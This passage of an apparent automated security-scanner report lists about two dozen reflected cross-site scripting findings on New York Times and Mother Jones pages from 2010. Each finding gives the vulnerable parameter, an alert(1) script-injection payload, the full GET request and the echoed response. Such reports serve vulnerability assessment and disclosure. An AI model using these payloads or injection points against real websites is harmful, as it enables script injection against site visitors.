<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... t3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=twr6db75\"><script>alert(1)</script>d8711375637"> ...[SNIP]...
|
3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://lens.blogs.nytimes.com |
Path: |
/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80454"><script>alert(1)</script>433d57f0df7 was submitted in the src parameter. This input was echoed as 80454\"><script>alert(1)</script>433d57f0df7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/?src=twr80454"><script>alert(1)</script>433d57f0df7 HTTP/1.1 Host: lens.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://lens.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ali;armando-franca;athar-hussain;carlos-barria;christoph-bangert;doug-mills;emilio-morenatti;hassan-ammar;john-woods;marcia-allert;merrill-d-oliver;pictures-of-the-day;rafiq-maqbool;saurabh-das&src=twr80454\"><script>alert(1)</script>433d57f0df7"> ...[SNIP]...
|
3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://mediadecoder.blogs.nytimes.com |
Path: |
/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e403"><script>alert(1)</script>d4b8c05b2e1 was submitted in the src parameter. This input was echoed as 9e403\"><script>alert(1)</script>d4b8c05b2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/?src=twr9e403"><script>alert(1)</script>d4b8c05b2e1 HTTP/1.1 Host: mediadecoder.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:06:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://mediadecoder.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... E&query=qstring&keywords=New+York+Times;television;guide+to+television;TV+Decoder;Carpetbagger;guide+to+media;newspapers;magazines;media;movies;marketing;new+media.+;mel-gibson;movies;new-media&src=twr9e403\"><script>alert(1)</script>d4b8c05b2e1"> ...[SNIP]...
|
3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://motherjones.com |
Path: |
/kevin-drum/2010/11/deficit-commission-serious |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ada2"><script>alert(1)</script>177d0296e29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious HTTP/1.1 Host: motherjones.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: public, max-age=900 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie,Accept-Encoding ETag: "1289613974" Last-Modified: Sat, 13 Nov 2010 02:06:14 GMT Content-Length: 80914 Date: Sat, 13 Nov 2010 02:06:15 GMT X-Varnish: 699349395 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> < ...[SNIP]... <a href="/user/login?destination=kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious" title="Login"> ...[SNIP]...
|
3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://motherjones.com |
Path: |
/kevin-drum/2010/11/deficit-commission-serious |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32510"><script>alert(1)</script>e15e07f5a9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious HTTP/1.1 Host: motherjones.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: public, max-age=900 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie,Accept-Encoding ETag: "1289613988" Last-Modified: Sat, 13 Nov 2010 02:06:28 GMT Content-Length: 80832 Date: Sat, 13 Nov 2010 02:06:29 GMT X-Varnish: 699351119 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> < ...[SNIP]... <a href="/user/login?destination=kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious" title="Login"> ...[SNIP]...
|
3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://motherjones.com |
Path: |
/kevin-drum/2010/11/deficit-commission-serious |
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70bd9"><script>alert(1)</script>957dc10fdf0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0 HTTP/1.1 Host: motherjones.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: public, max-age=900 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie,Accept-Encoding ETag: "1289613992" Last-Modified: Sat, 13 Nov 2010 02:06:32 GMT Content-Length: 209766 Date: Sat, 13 Nov 2010 02:06:33 GMT X-Varnish: 699351724 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> < ...[SNIP]... <a href="/user/login?destination=kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0" title="Login"> ...[SNIP]...
|
3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/10/movies/10morning.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db374"><script>alert(1)</script>0629960ed8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:06 GMT Content-type: text/html Content-Length: 73577
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1&pagewanted=print"> ...[SNIP]...
|
3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/10/movies/10morning.html |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d84"><script>alert(1)</script>ce1cd022825 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:07 GMT Content-type: text/html Content-Length: 74132
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825&pagewanted=print"> ...[SNIP]...
|
3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12con.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff212"><script>alert(1)</script>0c4b8fd9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:19 GMT Content-type: text/html Content-Length: 68389
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1&pagewanted=print"> ...[SNIP]...
|
3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12con.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31673"><script>alert(1)</script>5674461d5ef was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:24 GMT Content-type: text/html Content-Length: 67711
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef&pagewanted=print"> ...[SNIP]...
|
3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12cool.html |
Issue detail
The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6752"><script>alert(1)</script>74abf7409cf was submitted in the hpw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:14 GMT Content-type: text/html Content-Length: 72542
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf&pagewanted=print"> ...[SNIP]...
|
3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12cool.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b8d"><script>alert(1)</script>54b1ab9b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:15 GMT Content-type: text/html Content-Length: 72399
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1&pagewanted=print"> ...[SNIP]...
|
3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12cool.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dd44"><script>alert(1)</script>9aa1f156ce7 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:20 GMT Content-type: text/html Content-Length: 72629
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7&pagewanted=print"> ...[SNIP]...
|
3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12disco.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9017b"><script>alert(1)</script>45b207650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:27 GMT Content-type: text/html Content-Length: 72730
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1&pagewanted=print"> ...[SNIP]...
|
3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12disco.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d08f"><script>alert(1)</script>69375a1df98 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:30 GMT Content-type: text/html Content-Length: 69744
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98&pagewanted=print"> ...[SNIP]...
|
3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12eichmann.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b27"><script>alert(1)</script>9def6fb92c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:31 GMT Content-type: text/html Content-Length: 73079
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1&pagewanted=print"> ...[SNIP]...
|
3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12eichmann.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a15af"><script>alert(1)</script>c361f4dc1e3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:32 GMT Content-type: text/html Content-Length: 71255
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3&pagewanted=print"> ...[SNIP]...
|
3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12helena.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48c1"><script>alert(1)</script>f0282204989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:29 GMT Content-type: text/html Content-Length: 67007
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1&pagewanted=print"> ...[SNIP]...
|
3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12helena.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64df0"><script>alert(1)</script>d14aae068de was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:32 GMT Content-type: text/html Content-Length: 66696
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de&pagewanted=print"> ...[SNIP]...
|
3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12magic.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd739"><script>alert(1)</script>dc7aa52ab74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:29 GMT Content-type: text/html Content-Length: 65843
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1&pagewanted=print"> ...[SNIP]...
|
3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12magic.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406e"><script>alert(1)</script>b4e8ca7152d was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:34 GMT Content-type: text/html Content-Length: 66285
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d&pagewanted=print"> ...[SNIP]...
|
3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12shake.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb50"><script>alert(1)</script>3a8abc30d4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:24 GMT Content-type: text/html Content-Length: 73541
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1&pagewanted=print"> ...[SNIP]...
|
3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12shake.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936e2"><script>alert(1)</script>24773b8c686 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:22 GMT Content-type: text/html Content-Length: 74178
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686&pagewanted=print"> ...[SNIP]...
|
3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12tiny.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8da"><script>alert(1)</script>c3bf061f155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:09 GMT Content-type: text/html Content-Length: 72793
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1&pagewanted=print"> ...[SNIP]...
|
